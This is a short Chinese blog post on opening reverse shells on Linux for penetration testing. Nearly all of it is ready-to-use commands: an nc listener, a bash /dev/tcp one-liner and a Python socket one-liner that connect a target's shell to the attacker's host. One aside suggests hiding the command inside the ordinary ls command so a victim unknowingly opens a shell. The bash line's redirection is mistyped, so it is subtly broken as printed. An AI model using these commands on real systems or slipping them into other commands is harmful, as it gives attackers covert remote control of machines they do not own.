幾種Linux下反彈shell的方法
阿新 • • 發佈:2020-12-26
技術標籤:kali潶客技術
在滲透測試過程中我們需要把測試目標的shell反彈到我們的主機中,方便測試。比如在測試到命令注入時,可以反彈shell進行進一步測試。
一、nc和bash
在我們的主機上執行
nc -lvp port
表示顯示執行過程監聽埠
在目標主機上執行
bash -i >& /dev/tcp/ip/port 0>$1
(擴充套件:可以把此命令嵌入到常用的 ls 命令,神不知鬼不覺的讓對方給你建立一個反彈shell,豈不妙哉!)
這樣就可以在我們的主機上執行命令了
二、nc和python
在我們的主機上執行 nc -lvp port
表示顯示執行過程監聽埠
服務端執行以下命令
python -c “import
os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘ip’,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([’/bin/bash’,’-i’]);”
注意修改ip和port為主機的ip和埠
測試效果如下